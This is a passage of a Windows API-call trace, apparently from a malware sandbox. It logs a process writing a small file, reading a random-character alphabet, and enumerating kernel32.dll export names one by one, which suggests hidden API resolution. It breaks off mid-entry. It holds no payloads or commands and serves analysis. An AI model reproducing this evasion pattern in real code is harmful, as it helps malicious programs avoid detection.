[0180.913] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0180.913] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.913] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.913] CloseHandle (hObject=0x278) returned 1 [0180.913] SetFilePointerEx (in: hFile=0x274, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.914] WriteFile (in: hFile=0x274, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fdcb8, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fdcb8*=0x108, lpOverlapped=0x0) returned 1 [0180.914] CloseHandle (hObject=0x0) returned 0 [0180.914] CloseHandle (hObject=0x274) returned 1 [0180.914] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.915] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.915] GetTickCount () returned 0x1134aa7 [0180.915] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.915] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0180.915] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0180.915] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0180.916] lstrlenA (lpString="kernel32.dll") returned 12 [0180.916] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0180.916] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0180.916] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0180.916] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0180.916] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0180.916] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0180.916] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0180.916] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0180.916] lstrlenA (lpString="ADDATOMA") returned 8 [0180.916] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0180.916] lstrlenA (lpString="ADDATOMW") returned 8 [0180.916] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0180.916] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0180.916] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0180.916] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0180.916] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0180.916] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0180.916] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0180.916] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0180.916] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0180.916] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0180.916] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0180.916] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0180.916] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0180.916] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0180.916] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0180.916] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0180.916] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0180.916] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0180.916] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0180.916] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0180.917] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0180.917] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0180.917] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0180.917] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0180.917] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0180.917] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0180.917] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0180.917] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0180.917] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0180.917] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0180.917] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0180.917] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0180.917] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0180.917] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0180.917] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0180.917] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0180.917] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0180.917] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0180.917] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0180.917] lstrlenA (lpString="BACKUPREAD") returned 10 [0180.917] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0180.917] lstrlenA (lpString="BACKUPSEEK") returned 10 [0180.917] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0180.917] lstrlenA (lpString="BACKUPWRITE") returned 11 [0180.917] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0180.917] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0180.917] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0180.917] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0180.917] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0180.917] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0180.917] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0180.917] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0180.917] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0180.917] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0180.917] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0180.917] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0180.917] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0180.918] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0180.918] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0180.918] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0180.918] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0180.918] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0180.918] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0180.918] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0180.918] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0180.918] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0180.918] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0180.918] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0180.918] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0180.918] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0180.918] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0180.918] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0180.918] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0180.918] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0180.918] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0180.918] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0180.918] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0180.918] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0180.918] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0180.918] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0180.918] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0180.918] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0180.918] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0180.918] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0180.918] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0180.918] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0180.918] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0180.918] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0180.918] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0180.918] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0180.918] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0180.918] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0180.918] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0180.918] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0180.918] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0180.919] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0180.919] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0180.919] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0180.919] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0180.919] lstrlenA (lpString="BEEP") returned 4 [0180.919] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0180.919] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0180.919] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0180.919] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0180.919] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0180.919] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0180.919] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0180.919] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0180.919] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0180.919] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0180.919] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0180.919] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0180.919] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0180.919] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0180.919] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0180.919] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0180.919] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0180.919] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0180.919] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0180.919] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0180.919] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0180.919] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0180.919] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0180.919] lstrlenA (lpString="CANCELIO") returned 8 [0180.919] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0180.919] lstrlenA (lpString="CANCELIOEX") returned 10 [0180.919] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0180.919] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0180.919] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0180.919] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0180.919] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0180.919] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0180.919] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0180.919] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0180.920] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0180.920] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0180.920] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0180.920] lstrlenA (lpString="CHECKELEVATION") returned 14 [0180.920] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0180.920] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0180.920] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0180.920] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0180.920] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0180.920] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0180.920] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0180.920] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0180.920] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0180.920] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0180.920] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0180.920] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0180.920] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0180.920] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0180.920] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0180.920] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0180.920] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0180.920] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0180.920] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0180.920] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0180.920] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0180.920] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0180.920] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0180.920] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0180.920] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0180.920] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0180.920] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0180.920] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0180.920] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0180.920] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0180.920] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0180.920] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0180.920] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0180.921] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0180.921] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0180.921] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0180.921] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0180.921] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0180.921] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0180.921] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0180.921] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0180.921] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0180.921] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0180.921] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0180.921] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0180.921] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0180.921] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0180.921] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0180.921] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0180.921] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0180.921] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0180.921] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0180.921] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0180.921] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0180.921] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0180.921] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0180.921] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0180.921] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0180.921] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0180.921] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0180.921] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0180.921] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0180.921] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0180.921] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0180.921] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0180.921] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0180.921] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0180.921] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0180.921] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0180.921] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0180.921] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0180.922] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0180.922] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0180.922] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0180.922] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0180.922] lstrlenA (lpString="COPYCONTEXT") returned 11 [0180.922] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0180.922] lstrlenA (lpString="COPYFILEA") returned 9 [0180.922] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0180.922] lstrlenA (lpString="COPYFILEEXA") returned 11 [0180.922] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyFileExW" | out: 